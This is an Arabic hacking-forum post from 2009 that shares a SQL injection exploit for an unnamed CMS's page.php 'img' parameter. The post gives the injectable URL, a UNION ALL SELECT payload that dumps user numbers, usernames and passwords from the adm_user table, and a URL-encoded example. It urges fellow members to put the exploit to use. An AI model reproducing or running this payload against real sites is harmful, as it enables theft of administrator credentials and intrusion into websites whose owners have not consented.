عرض مشاركة واحدة
قديم 12-19-2009, 10:36 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
Black-FoG
VbSpIdeR T34M
 
الصورة الرمزية Black-FoG
 

 

 
إحصائية العضو






Black-FoG غير متواجد حالياً

إرسال رسالة عبر MSN إلى Black-FoG

 

 

إحصائية الترشيح

عدد النقاط : 10
Black-FoG is on a distinguished road

افتراضي ثغرة جديدة من فرن فولكانو بتاريخ اليوم


السلام عليكم ...

اليوم بعثلي فولكانو ثغرة جديدة وحصرية :


الملف المصاب :



كود:
http://server/cms/page.php?p=1&img=[N.A.S.T ]
الاستغلال :


كود:
http://server/cms/page.php?p=1&img=-1+UNION+ALL+select+1,2,3,4,5,GROUP_concat(CONVERT(num USING utf8),0x3a,CONVERT(user USINGutf8),0x3a,CONVERT(pswd USING utf8)),7,8,9,10,11,12,13,14+from+adm_user

مثال :

كود:
http://server/cms/page.php?p=1&img=-207+UNION+ALL+select+1,2,3,4,5,GROUP_concat%28CONVERT%28num%20USING%20utf8%29,0x3a,CONVERT%28user%20USING%20utf8%29,0x3a,CONVERT%28pswd%20USING%20utf8%29%29,7,8,9,10,11,12,13,14+from+adm_user



تحية لفولكانو على الشغل الجامد ... يله يا شباب ورونا همتكم ...





Adiooooos


eyvm []d]m lk tvk t,g;hk, fjhvdo hgd,l

التوقيع

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[align=center]قريبا... فريق [-=BFT=-][/align]

 

   

رد مع اقتباس